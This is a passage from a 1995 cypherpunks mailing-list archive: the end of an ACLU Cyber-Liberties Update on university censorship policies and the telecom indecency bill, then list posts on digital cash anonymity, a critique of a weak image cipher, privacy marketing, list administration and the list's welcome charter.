flourished for years as primarily an academic -- and uncensored --
domain.  Colleges should not now cave in to the Luddites by
enacting restrictive computer usage policies.

Here are a few examples of university computer usage policies
that tread on cyber-liberties:

*  After a year-long battle that made national news, Carnegie
Mellon University is expected this November to approve a policy
to censor certain Usenet newsgroups on Andrew, their flagship
computing system.  Their decision to censor is based on fear that
the university could be held criminally liable under state
obscenity and harmful to minors laws for providing access to
newsgroups that "might be" obscene.  The administration refused
to accept the suggestion of both the CMU Faculty Senate and the
ACLU that the computer network be categorized as a library, which
would entitle the network to an exemption from the Pennsylvania
obscenity statute.

*  The University of Minnesota will not allow students to have
"offensive" content on their web sites, or even to create links
to "offensive" content elsewhere on the Internet.  They have also
adopted the double standard of commercial services like America
Online and Prodigy -- despite U of Minn's explicit content
control, student web pages must include a disclaimer that the
university takes "no responsibility" for anything on the pages.

*  At George Mason University, the "Responsible Use of Computing"
policy begins with the following statement:  "The following rules
are not complete; just because an action is not explicitly
proscribed does not necessarily mean that it is acceptable." 
(One could hardly imagine a better example of ambiguity with the
potential to chill protected speech.)  The policy creates a
Security Review Panel that investigates reports of "offensive"
computer behavior.  As could be predicted, the backlog of cases
before this panel is already quite long.  (The head of the
Security Review Panel is none other than Dr. Peter Denning,
husband of Dr. Dorothy Denning, infamous proponent of the Clipper
Chip.)

On the bright side, students and faculty groups continue to hotly
oppose these policies when they arise, and have been instrumental
in shaping Internet usage policies to be less inhibitive of free
speech and privacy rights.  The following online resources will
be useful to students and faculty faced with a draconian Internet
usage policy:

*  Report on Computers at Harvard, by the Civil Liberties Union
of Harvard: _Very_ comprehensive and useful report on students'
computer usage rights on Harvard's network.  Included are five
general principles for computer use, an application of the
general principles to specific aspects of computer use, and a
discussion of areas where Harvard should take immediate action to
secure students' rights on the network.  Available at
gopher://fas-gopher.harvard.edu:70/00/.studorgs/.cluh/.computer_report

*  Web Site on CMU Censorship Proposal:  Thorough history and
database of documents on Carnegie Mellon University's battle over
online censorship. Also includes information on CMU's Coalition
for Academic Freedom of Expression (CAFE).  See
http://www.cs.cmu.edu/afs/cs/usr/kcf/www/censor/

*  ACLU letter and legal analysis to CMU:  send a message to
infoaclu@aclu.org with "Letter to CMU" in the subject line.

The ACLU will continue to monitor university polices that
restrict online free speech and privacy rights.  The ACLU urges
all students and faculty to actively work for university computer
usage policies that protect their rights.  To inform the ACLU of
a computer usage policy at your school that may violate
cyber-liberties, contact Ann Beeson, ACLU, beeson@aclu.org.
-----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
-----------------------------------------------------------------
*    Conferees Named for Federal Online Indecency Legislation

Congress recently named the official conferees to the
telecommunications bill.  The Senate version of the telco bill (S
652) contains the Exon Amendment, approved 84-16 by the Senate on
6/14/95.  The House version of the telco bill (HR 1555) contains
the Cox/Wyden Amendment (the Internet Freedom and Family
Empowerment Act), approved 421-4 on 8/4/95.  The House version
also contains Exon-like amendments to the existing federal
obscenity statute, which came out of the House Judiciary
Committee and were adopted as last-minute additions through a
larger Manager's Amendment on 8/4/95.  The conference committee
is in charge of reconciling the differences between the House and
Senate versions of the telco bill, including the obviously
incompatible provisions regarding online content.

While more details are offered in the list below, the following
facts should be highlighted:

_Notable Conferees_
-Senator Exon:  sponsored the Exon Amendment and launched the
cyber-porn scare.
-Senator Gorton: original co-sponsor of the CDA.
-Representative Hyde: sponsored the inclusion of indecency
amendments to the federal obscenity laws in the House telco bill.
-Representatives White, Markey, Goodlatte, Fields, and Barr:  
spoke in favor of Cox/Wyden amendment on the House floor during
the telco debate.

_Some Absent Conferees_
-Members of the Senate Judiciary Committee.
-Senator Leahy: sponsored the study alternative to the CDA in the
Senate (Senator Leahy is a member of the Senate Judiciary
Committee).
-Representatives Cox & Wyden: sponsored the Cox/Wyden "Internet
Freedom and Family Empowerment Act."
-Senators who voted against the CDA.

_Other Notable Facts_
-All the Senate conferees voted for the CDA.
-All the House conferees voted for the Cox/Wyden amendment.
-All the House conferees also voted for the Exon-like indecency
amendments to federal obscenity laws.  However, they may not have
been aware of this vote because it was not a separate vote but
rather a vote to approve the Manager's amendment, which contained
many provisions unrelated to the censorship legislation.
-Given the conferees named, it is highly likely that the House
leadership, including House Speaker Newt Gingrich, will play a
substantial role in the conference process.

THE LIST OF CONFEREES:

Conferees from the House were assigned to particular titles of
the telco bill; Senate conferees have jurisdiction over all
titles.  The list that follows indicates the titles over which
each conferee has jurisdiction, and the conferee's relevant
committee status, party, and area of constituency.

*Title I: Development of Competitive Telecommunications Markets
(contains the Cox/Wyden amendment)
Title II: Cable Communications Competitiveness
Title III: Broadcast Communications Competitiveness
*Title IV: Effect on Other Laws
(contains the Exon Amendment and the Exon-like indecency
amendments to the federal obscenity statute)
Title V: Definitions
Title VI: Small Business Complaint Procedure

Representatives from the House:

Jurisdiction over Titles I and IV (these conferees may
participate in discussions to reconcile the conflicting online
content provisions in the Cox/Wyden Amendment, the Exon
Amendment, and the Exon-like indecency amendments to the federal
obscenity statute):

Representatives from the House Commerce Committee, in order of
rank:

Republicans:

Bliley, Thomas J. (Richmond, Virginia) all titles
Fields, Jack (Houston, Texas) all titles
Oxley, Michael G. (northwest Ohio) all titles
White, Rick (northwest Washington) all titles
Barton, Joseph (Fort Worth, Texas) I, II, IV, V
Hastert, J. Dennis (northeast Illinois) I, II, IV, V
Klug, Scott (Madison, Wisconsin) I, III, IV, V, VI

Democrats:

Dingell, John D. (southeast Michigan) all titles
Markey, Edward J. (northeast Massachusetts) all titles
Boucher, Rick (southwest Virginia) all titles
Eshoo, Anna G. (San Francisco Bay Area, California) all titles
Rush, Bobby L. (Chicago, Illinois) all titles

Representatives from the House Judiciary Committee, in order of
rank:

Republicans:

Hyde, Henry J. (Chicago, Illinois) all titles
Moorhead, Carlos J. (Los Angeles area, California) all titles
Goodlatte, Robert W. (Western Virginia) all titles
Buyer, Steve (northwest Indiana) all titles
Flanagan, Michael P. (Chicago, Illinois) all titles

Democrats:

Conyers, John (Detroit, Michigan) all titles
Schroeder, Patricia (Denver, Colorado) all titles
Bryant, John (Dallas, Texas) all titles

Title I only (these conferees may participate in discussions to
revise the Cox/Wyden Amendment, but may not participate in
discussions to reconcile the conflicting online content
provisions in the Cox/Wyden Amendment, the Exon Amendment, and
the Exon-like indecency amendments to the federal obscenity
statute):

Representatives from the House Commerce Committee, in order of
rank:

Republicans:

Paxon, Bill (western New York) I, III
Frisa, Dan (New York, New York) I, II
Stearns, Cliff (northeast Florida) I, III

Democrats:

Brown, Sherrod (northeast Ohio) I
Gordon, Bart (central Tennessee) I
Lincoln, Blanche Lambert (northeast Arkansas) I

Representatives from the House Judiciary Committee, in order of
rank:

Republicans:

Gallegly, Elton (southern California) I
Barr, Bob (western Georgia) I
Hoke, Martin R. (northeast Ohio) I

Democrats:

Berman, Howard L. (Los Angeles area, California) I
Scott, Robert C. (Richmond, Virginia) I
Lee, Sheila Jackson (Houston, Texas) I

Conferees from the Senate Commerce Committee, in order of rank
(the Senate conferees have jurisdiction over all titles):

Republicans:

Pressler, Larry (South Dakota)
Stevens, Ted (Alaska)
McCain, John (Arizona)
Burns, Conrad (Montana)
Gorton, Slade (Washington)
Lott, Trent (Mississippi)

Democrats:

Hollings, Ernest F. (South Carolina)
Inouye, Daniel K. (Hawaii)
Ford, Wendell H. (Kentucky)
Exon, James J. (Nebraska)
Rockefeller, John D. (West Virginia)

For a copy of the online indecency amendments, send a message to
infoaclu@aclu.org with "Online Indecency Amendments" in the
subject line of the message.

For more information on the legislation and what you can do to
fight it, see:
http://epic.org/free_speech
http://www.panix.com/vtw/exon
http://www.eff.org/
http://www.cdt.org/
-----------------------------------------------------------------
*  Search for Plaintiffs Continues in Suit to Challenge Online
Indecency Legislation
     
As noted above, the online community should continue to urge the
conference committee to remove the censorship provisions from the
telco bill.  At the same time, a coalition has formed to organize
litigation to challenge these provisions if they are signed into
law.  

The first step is the selection of plaintiffs.  We need
plaintiffs who use online networks to discuss or distribute works
or art, literary classics, sex education, gay and lesbian
literature, human rights  reporting, abortion information, rape
counseling, controversial political speech, or any other material
that could be deemed "indecent" and therefore illegal under the
proposed law.

We received a tremendous response to our first call for
plaintiffs, in the last issue of the ACLU Cyber-Liberties Update. 
Thanks to all the organizations who contacted us.  We urge other
groups to join the battle to save free speech in cyberspace.

Please contact Ann Beeson at the ACLU if your organization is
interested in being a plaintiff in this ground-breaking
litigation that will define First Amendment rights in cyberspace. 
212-944-9800 x788, beeson@aclu.org.
-----------------------------------------------------------------
*  Effect of Telco Bill on Universal Access

In addition to the online censorship provisions in the telco 
bill, the ACLU is seriously concerned about the effect of 
other provisions in the bill on universal access.

For more information about the effect of the telco bill on 
universal access and other public interest matters, see 
the Ad Hoc Site Against the Telecommunications Bill, 
co-sponsored by Center for Media Education, Computer 
Professionals for Social Responsibility, Consumer 
Federation of America, Electronic Privacy Information 
Center, Media Access Project, People for the American 
Way, and Taxpayer Assets Project, at 
http://www.access.digex.net:80/~cme/bill.html.
-----------------------------------------------------------------
CONFERENCES
-----------------------------------------------------------------
Oct 26, 5 pm: "Law in Cyberspace: Free Expression and
Intellectual Property on the Internet," Georgetown University Law
Center, 600 New Jersey NW, Gewirz Conference Room, Gewirz Hall. 
Co-sponsored by ACLU-GULC and Student Intellectual Property Law
Association.  Panelists include David Post (GULC Law professor
and author of column on cyberspace law in American Lawyer); John
Podesta (GULC professor and former senior policy advisor to
President Clinton on govt information policy); and David Johnson
(co-founder of the Cyberspace Law Institute, President of Lexis
Counsel Connect).

Nov 3, 8 pm:  John Perry Barlow on "Creating Cyberculture," Kane
Hall - University of Washington in Seattle.  $12 ($10 students).  
The lecture is part of a series, co-sponsored by the ACLU of 
Washington, that explores the impact and implications of the 
technology revolution on art and culture.  Other cosponsors include 
911 Media Arts Center, the University of Washington's New Media 
Lab, and the University of Washington Technical Communications 
Department.

Nov 16, 5 pm: Nadine Strossen (National President, ACLU) speaks
on "Defending Pornography: A Feminist Perspective on New
Technologies and Old-Fashioned Sex," GULC, 600 New Jersey NW,
12th Floor Ballroom, Gewirz Hall.  Co-sponsored by ACLU-GULC and
the Student Bar Association Speakers Fund.
-----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU
-----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under
construction at http://www.aclu.org.  In the meantime, you can
retrieve ACLU documents via gopher at gopher://aclu.org:6601
(forgive the less-than-updated state of our gopher -- we've
devoted all our resources to WWW construction!).  If you're on
America Online, check out the live chats, auditorium events,
*very* active message boards, and complete news on civil
liberties, at keyword ACLU.
-----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a 
message to infoaclu@aclu.org with "subscribe Cyber-Liberties 
Update" in the subject line of your message.  To terminate 
your subscription, send a message to infoaclu@aclu.org with 
"unsubscribe Cyber-Liberties Update" in the subject line.

For general information about the ACLU, write to
infoaclu@aclu.org.
-----------------------------------------------------------------
**PLEASE REPOST WITH HEADER INTACT**




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 25 Oct 95 14:08:48 PDT
To: cypherpunks@toad.com
Subject: Payments FAQ
In-Reply-To: <308E88FD-00000001@valhalla.gte.com>
Message-ID: <9510252108.AA20191@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	Im'm getting overloaded by requests as to where various 
payments info happens to be. Here is the URL of an overview I produced.

http://www.w3.org/hypertext/WWW/Payments/roadmap.html

You can find SEPP from here and most other schemes, even Magic
Money for cypherpunks afficianados.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 25 Oct 95 00:17:16 PDT
To: alano@teleport.com (Alan Olsen)
Subject: Re: CJR returned to sender [NOISE][Noise][noise]
In-Reply-To: <199510250602.XAA20850@desiree.teleport.com>
Message-ID: <199510250711.RAA10267@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Alan Olsen <alano@teleport.com>
  and raph@cs.berkeley.edu

> At 10:13 PM 10/24/95 -0700, you wrote:
> >   I got the CJR back today, envelope unopened (although the corner was
> >torn so you could see there were t-shirts inside). "Returned to sender",
> >it said, "Refused___, Unclaimed___".
...
> That is what you get for warning people in advance!  (I would say that they
> "skirted" the issue, but that is not a-dress-ed here...) Maybe they read the
   ^^^^^^^

You mean steam open the package, cut up the T-shirts and make them
into skirts?

Now that *would* be strange.

> list and knew what you were up to. Why else would they refuse free t-shirts?
> (Or maybe they had already talked with Netscape that week...) ];>


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMI3jKixV6mvvBgf5AQHjhQQAxDjtSHFvyrkS2RUpAyY2R8J5KaW4YmGp
5W4WSagU5eouzIUpYHBHteNSWYGlP0R4Tv+idH+kzeaLL+eJyQrfHjzLa5wmbuV2
iJ+fdUbYeYcBpWcdEbsQGkQCuAy/UEdo9xzXJNulrNBqTWqoDneHf2tY+rcfYDyS
PP5yfgLUGZc=
=j0wv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 25 Oct 95 00:37:58 PDT
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510240750.IAA04175@utopia.hacktic.nl>
Message-ID: <199510250737.RAA10407@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com

...
> I think the most interesting hack to pursue is to eliminate the
> payee-nonanonymity problem.
...
 
> The  <--(blinding)--- payer <--(blinding)--- payee
> Bank --(unblinding)-> payer --(unblinding)-> payee --> payee spends money

The payer would want to check the proto-coins for values which show
through the blinding. Are there any such values?

To guard agains unknown possibilities in this area, the payer might
want to check that the proto-coins are valid (at least).

...
> Privacy for all involved.

How about the bank?

Given that the thing's patented, the bank might conceivably wish
to remain anonymous :-)


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMI3pNixV6mvvBgf5AQGWRgP/fiv5UlZ/9V5qavCNdLzxJr0/M0M4lTCN
ITx8nsGBr7kt345v55LP63nQB54tvp8Zpx1BWtkYDN4WyHdF/+wnziCP2AMVUDhI
ZX9fG1p8WjCg8eqsboQmeerLCDq5oR7ic0ui86jU0nW4jJ4aLwnoXCCdHyEsi5oR
qCZnNG43JhY=
=YNgV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Wed, 25 Oct 95 18:15:15 PDT
To: dnew@sgf.fv.com (Darren New)
Subject: Re: DigiCash
In-Reply-To: <Pine.3.89.9510240909.C1481-0100000@sgf.fv.com>
Message-ID: <199510260038.RAA21478@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Darren New:
> If I give you a dollar for an online newspaper and the 
> newspaper never gets to me, or I give you $50 for a textbook and the 
> textbook never shows up in the mail weeks later, who do I go to to get my 
> money back?

This is a bad-case scenario, since it involves long delay and
delivery of goods that, unlike information, have a nontrivial
marginal cost to the merchant.  These both give the merchant
incentive to skip the delivery step.  For this kind of business, 
there are several possibilities, none of which  is mature enough
to have actually been deployed yet (which is why ecash is currently 
aimed at small, immediately delivered goods and services).

* Escrow services, which take responsibility for delivery each
way (and develop a public reputation for reliably doing this).
This has the value that it still allows the parties to be mutually
anonymous (although additional tools are needed to actually
have strongly anonymous connections, the payment/delivery protocol 
doesn't preclude it).
* Ripped bill protocols might be able to substitute for escrows.
(these are quite esoteric, but can again be hidden behind a nice
metaphor).
* Deal only with a jurisdictionally reachable merchant and hope the
law is on your side (often not an available solution on the global 
Internet, but usually assumed by identified payment schemes, so
it's a reasonable fallback from that point of view).

For smaller transactions with rapid delivery times, complaining 
loudly and publicly on Usenet will soon put the business out of it.
Receipts will give such complaints more credibility, and will also
allow the clearing agent to credibly get involved.  (Obviously
in these cases anonymity is lost for a particular transaction,
but unlinkability with one's unchallenged transactions remains).
Finally, in a few markets the value add of confidentiality is enough 
to outweigh the risks for even large transactions.

Nick Szabo				szabo@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Wed, 25 Oct 95 14:54:26 PDT
To: Steve <privsoft@ix.netcom.com>
Subject: Re: Re: Reformated: How secure....
In-Reply-To: <199510241425.HAA20039@ix3.ix.netcom.com>
Message-ID: <9510252154.AA01706@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Further, descrambling entails moving tiles and recognition of
> readable text.

Why do you make this claim?  If PrivaSoft's transposition cipher is
even superficially ok, a wrong-key decryption will look like a random
permutation of the input pixels, i.e. an image with the same
black/white statistics as the original (a slight weakness, IMHO) but
with none of its spatial coherence.  Look at the distribution of run
lengths, or of the size of connected components.  

I just went and looked at your "PrivaSoft in action" example, and I'd
have to say that the cipher is not "superficially ok".  The ciphertext
is visibly structured: there are visible fragments of letters (an "e",
an "n", a "k", the top of an "S"); there are evenly-spaced vertical
lines of dashes and crosses; I can see the bold text of the original
(what's more, it's only diffused over a small extent, not the whole
ciphertext); and, um, was the letterhead text supposed to be
unreadable, or just dirtied up a little?

Since the algorithm doesn't break up small-scale structure very well,
a more robust way of testing for correct decryption would be to
count the number of black pixels on each scan line, and examine this
for periodicity.  Even with some noise and scan skew, there will be
obvious periodicity for unencrypted text, and little for an incorrect
decipherment.

I don't mean to be unnecessarily hard on your software.  It's probably
fine against casually nosy people and for protecting mildly
embarassing information, and it's conveniently exportable.  But if you
represent it as suitable for high-value secrets, you're misleading
your customers.

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Wed, 25 Oct 95 18:31:43 PDT
To: cypherpunks@toad.com
Subject: Privacy Marketing
Message-ID: <199510260058.RAA27936@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Most Internet businesses, especially the Web software and
payment systems providers, are severely underestimating the market
for privacy features that is out there.  Consider: 

* A recent general survey showed that 83% of Americans are very 
concerned about their privacy on the "Information Superhighway".
One can expect even stronger figures from European customers, which
have more first-hand experience with private data, much of it
originally compiled for innocuous reasons, being used for
political repression.  The vast majority of our customers are
concerned about privacy.

* Marketing surveys on privacy that are both detailed and accurate
are hard to come by, because customers who care more about their privacy 
tend to dislike filling out detailed forms (even if they claim to be 
anonymous).

* Over half the BBS, and potentially the Internet, online service market
is in controversial services, where customers are even more concerned
about privacy than average.

* Privacy, once considered merely a political issue, is now being recognized 
for its more important aspect, as a market differentiator and value-add.
Marketers correctly recognize that government "privacy regulations" mean 
much less privacy for businesses if it is to be enforced, and the voters no
longer expect such laws to have any teeth in the face of modern
technology.  That hardly means that customers are not concerned about it, as
the numbers show.  The alternative to regulation is market solutions.
Recognize that many customers do want privacy, give them what they want, 
and contrast yourself to your competitor. Making visible the ways your 
competitor is violating their customers' privacy will become a powerful 
marketing strategy.  This strategy was used rather timidly, and inaccurately,
by AT&T against MCI, where it nevertheless had great success.  (Inaccurate
because all major phone companies compile lists of who calls whom,
and use them for marketing as well as billing -- MCI was simply being more 
honest about it).  Used boldly and accurately, privacy marketing has 
vast potential to upset competitors who rely too much on marketing 
data and not enough on empathy with the human customer.  For an idea
of what such a marketing campaign might be like, imagine combining
Apple "1984" Mac ads, one of the most effective campaigns in history,
with the AT&T vs. MCI campaign, to sell products and services that 
in fact do protect customer privacy where the competition does not.  

* Most Americans do _not_ participate in frequent flier and similar
customer tracking programs.  Many who do participate don't realize
the extent to which their lifestyle is tracked, since these actions
are performed on remote databases, well hidden from the customer.
If customers aren't concerned about their privacy, then why the need for 
all the distracting gimmicks and giveaways?  Why not just promote these 
programs straightforwardly to the customer as "Customer Tracking 
Programs"?  A competitor who can provide a privacy protecting solution
can do just that, damaging these tracking programs severely.

* It is ludicrous to argue that cash transactions, which leave no
identified paper trail, provide no practical privacy.  In fact they
prevent detailed compilation of lifestyle habits, by (a) not
depending on identity to settle the transaction, (b) making
identity tracking, where it occurs, a visible, separate process, and 
(c) making it too expensive to track identity via the payment system itself,
except in extreme, very rare cases.  In practice, this means that cash 
customers don't get their lifestyles described in detail in remote 
databases, while non-confidential electronic payers increasingly do.  
Eventually this sharp difference in outcome will feed back to the 
customer, greatly increasing the demand for cash over non-confidential
electronic payment.

* A big challenge for vendors value-adding privacy is to accurately 
communicate these privacy features, through both the user interface and their
marketing, while debunking fraudulent claims (such as calling 
non-confidential payment systems "cash") and exposing the privacy
violating actions of their competitors.

I conclude that privacy marketing will be an important value-add for
Internet commerce.  It will be a terrific way to gain market share at 
the expense of the competition  -- or to lose much of your market share, 
if you find yourself on the wrong end of a privacy campaign.


Nick Szabo				szabo@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 25 Oct 95 15:02:45 PDT
To: cypherpunks-owner@toad.com
Subject: [ADMIN] Re: Welcome to cypherpunks
In-Reply-To: <9510251917.AA27873@toad.com>
Message-ID: <Pine.SOL.3.91.951025175202.17438A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Oct 1995 Majordomo@toad.com wrote:

> --
> 
> Welcome to the cypherpunks mailing list!
> 

Having received this message from majordomo@toad.com and seeing an 
apparent return of the mail-multiplication problem of recent days, I am 
beginning to suspect that some bozo has subscribed the c-punx list to the 
c-punx list.  A curse upon them and for good measure, a recurse upon them.

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 25 Oct 95 18:19:00 PDT
To: cypherpunks@toad.com, gnu
Subject: Re: [ADMIN] Re: Welcome to cypherpunks
In-Reply-To: <Pine.SOL.3.91.951025175202.17438A-100000@welchlink.welch.jhu.edu>
Message-ID: <9510260118.AA07260@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> beginning to suspect that some bozo has subscribed the c-punx list to the 
> c-punx list.  A curse upon them and for good measure, a recurse upon them.
Cc: `

It's true, for a period of about 45 minutes today, someone subscribed
the Cypherpunks list to itself.  This resulted in a small number of
looped messages.

Also in today's bogus news, a rather testy newbie, Arthur Germain,
subscribed at 8AM Tuesday.  He had unsubscribed by 3PM Tuesday, but
when he got another twenty or thirty messages (that had been sent to
cypherpunks while he was a subscriber, but which hadn't reached him
yet), he forwarded each of them back to the mailing list.  You may or
may not have seen some of these; I killed off further distribution.

	John Gilmore
	assistant in charge of burping Majordomo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Wed, 25 Oct 95 15:43:26 PDT
To: Majordomo@toad.com
Subject: Re: Welcome to cypherpunks
Message-ID: <9509258146.AA814672676@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     Why am I getting this when I am already subscribed to the list??????
     
     Skip


______________________________ Reply Separator _________________________________
Subject: Welcome to cypherpunks
Author:  Majordomo@toad.com at internet
Date:    25-10-95 12:17


--
     
Welcome to the cypherpunks mailing list!
     
If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command 
in the body of your email message:
     
    unsubscribe cypherpunks cypherpunks@toad.com
     
Here's the general information for the list you've 
subscribed to, in case you don't already have it:
     
     
     
About cypherpunks
-----------------
     
I. Administrivia (please read, boring though it may be)
     
The cypherpunks list is a forum for discussing personal defenses for 
privacy in the digital domain.  It is a high volume mailing list.  If 
you don't know how to do something, like unsubscribe, send mail to
     
 majordomo@toad.com
     
and the software robot which answers that address will send you back 
instructions on how to do what you want.  If you don't know the 
majordomo syntax, an empty message to this address will get you a help 
file, as will a command 'help' in the body.  Even with all this 
automated help, you may still encounter problems.  If you get really 
stuck, please feel free to contact me directly at the address I use 
for mailing list management:
     
 cypherpunks-owner@toad.com
     
Please use this address for all mailing list management issues.  Hint: 
if you try to unsubscribe yourself from a different account than you 
signed up for, it likely won't work.  Log back into your old account 
and try again.  If you no longer have access to that account, mail me 
at the list management address above.
     
For other questions, my list management address is not the best place, 
since I don't read it every day.  To reach me otherwise, send mail to
     
 eric@remailer.net
     
This address is appropriate for emergencies (and wanting to get off 
the list is never an emergency), such as the list continuously spewing 
articles.  Please don't send me mail to my regular mailbox asking to 
be removed; I'll just send you back a form letter.
     
Do not mail to the whole list asking to be removed.  It's rude.  The 
-request address is made exactly for this purpose.
     
To post to the whole list, send mail to
     
 cypherpunks@toad.com
     
If your mail bounces repeatedly, you will be removed from the list. 
Nothing personal, but I have to look at all the bounce messages.
     
There is no digest version available.
     
There is an announcements list which is moderated and has low volume. 
Announcements for physical cypherpunks meetings, new software and 
important developments will be posted there.  Mail to
     
 cypherpunks-announce-request@toad.com
     
if you want to be added or removed to the announce list.  All 
announcements also go out to the full cypherpunks list, so there is no 
need to subscribe to both.
     
     
II. About cypherpunks
     
The cypherpunks list is not designed for beginners, although they are 
welcome.  If you are totally new to crypto, please get and read the 
crypto FAQ referenced below.  This document is a good introduction, 
although not short.  Crypto is a subtle field and a good understanding 
will not come without some study.  Please, as a courtesy to all, do some 
reading to make sure that your question is not already frequently asked.
     
There are other forums to use on the subject of cryptography.  The 
Usenet group sci.crypt deals with technical cryptography; cypherpunks 
deals with technical details but slants the discussion toward their 
social implications.  The Usenet group talk.politics.crypto, as is 
says, is for political theorizing, and cypherpunks gets its share of 
that, but cypherpunks is all pro-crypto; the debates on this list are 
about how to best get crypto out there.  The Usenet group 
alt.security.pgp is a pgp-specific group, and questions about pgp as 
such are likely better asked there than here.  Ditto for 
alt.security.ripem.
     
The cypherpunks list has its very own net.loon, a fellow named L. 
Detweiler.  The history is too long for here, but he thinks that 
cypherpunks are evil incarnate.  If you see a densely worded rant 
featuring characteristic words such as "medusa", "pseudospoofing", 
"treachery", "poison", or "black lies", it's probably him, no matter 
what the From: line says.  The policy is to ignore these postings. 
Replies have never, ever, not even once resulted in anything 
constructive and usually create huge flamewars on the list.  Please, 
please, don't feed the animals.
     
     
III. Resources.
     
A. The sci.crypt FAQ
     
anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt
     
The cryptography FAQ is good online intro to crypto.  Very much worth 
reading.  Last I looked, it was in ten parts.
     
B. cypherpunks ftp site
     
anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks
     
This site contains code, information, rants, and other miscellany. 
There is a glossary there that all new members should download and 
read.  Also recommended for all users are Hal Finney's instructions on 
how to use the anonymous remailer system; the remailer sources are 
there for the perl-literate.
     
C. Bruce Schneier's _Applied Cryptography_, published by Wiley
     
This is required reading for any serious technical cypherpunk.  An 
excellent overview of the field, it describes many of the basic 
algorithms and protocols with their mathematical descriptions.  Some 
of the stuff at the edges of the scope of the book is a little 
incomplete, so short descriptions in here should lead to library 
research for the latest papers, or to the list for the current 
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.
     
     
IV. Famous last words
     
My preferred email address for list maintenance topics only is 
hughes@toad.com.  All other mail, including emergency mail, should go 
to hughes@ah.com, where I read mail much more regularly.
     
Enjoy and deploy.
     
Eric
     
-----------------------------------------------------------------------------
     
Cypherpunks assume privacy is a good thing and wish there were more 
of it.  Cypherpunks acknowledge that those who want privacy must 
create it for themselves and not expect governments, corporations, or 
other large, faceless organizations to grant them privacy out of 
beneficence.  Cypherpunks know that people have been creating their 
own privacy for centuries with whispers, envelopes, closed doors, and 
couriers.  Cypherpunks do not seek to prevent other people from 
speaking about their experiences or their opinions.
     
The most important means to the defense of privacy is encryption. To 
encrypt is to indicate the desire for privacy.  But to encrypt with 
weak cryptography is to indicate not too much desire for privacy. 
Cypherpunks hope that all people desiring privacy will learn how best 
to defend it.
     
Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish 
to learn about it, to teach it, to implement it, and to make more of 
it.  Cypherpunks know that cryptographic protocols make social 
structures.  Cypherpunks know how to attack a system and how to 
defend it.  Cypherpunks know just how hard it is to make good 
cryptosystems.
     
Cypherpunks love to practice.  They love to play with public key 
cryptography.  They love to play with anonymous and pseudonymous mail 
forwarding and delivery.  They love to play with DC-nets.  They love 
to play with secure communications of all kinds.
     
Cypherpunks write code.  They know that someone has to write code to 
defend privacy, and since it's their privacy, they're going to write 
it.  Cypherpunks publish their code so that their fellow cypherpunks 
may practice and play with it.  Cypherpunks realize that security is 
not built in a day and are patient with incremental progress.
     
Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know 
that a widely dispersed system can't be shut down.
     
Cypherpunks will make the networks safe for privacy.
     
[Last updated Mon Feb 21 13:18:25 1994]
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
